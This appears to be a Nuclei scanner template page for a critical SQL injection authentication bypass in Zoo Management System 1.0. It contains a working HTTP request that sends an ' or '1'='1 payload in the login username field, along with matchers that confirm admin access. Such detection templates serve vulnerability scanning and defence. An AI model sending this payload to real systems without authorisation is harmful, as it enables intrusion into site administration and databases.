Skip to content

Zoo Management System 1.0 - SQL Injection

ID: zms-sqli

Severity: critical

Author: arafatansari

Tags: edb,packetstorm,zms,sqli,auth-bypass,cms

Zoo Management System 1.0 contains a SQL injection vulnerability via the username parameter on the login page. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.

id: zms-sqli
info:
name: Zoo Management System 1.0 - SQL Injection
author: arafatansari
severity: critical
description: |
Zoo Management System 1.0 contains a SQL injection vulnerability via the username parameter on the login page. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.
reference:
- https://www.exploit-db.com/exploits/48880
- https://packetstormsecurity.com/files/167572/Zoo-Management-System-1.0-Cross-Site-Scripting.html
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10
cwe-id: CWE-89
metadata:
verified: true
max-request: 1
tags: edb,packetstorm,zms,sqli,auth-bypass,cms
http:
- raw:
- |
POST /admin/index.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
username=admin%27+or+%271%27%3D%271&password=any&login=
host-redirects: true
max-redirects: 2
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'ZMS ADMIN'
- 'Dashboard'
- 'Zoo Management System'
condition: and
- type: status
status:
- 200
# digest: 490a004630440220237e429407a431a45bac607a60490f2a9770e77f6e53d862b389d1b40263ee3c022024fdbfa382079a53305bf4d7c5123d144053e764c9fc68a74dc1d59ec2a66c75:922c64590222798bb761d5b6d8e72950

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/vulnerabilities/other/zms-sqli.yaml"

View on Github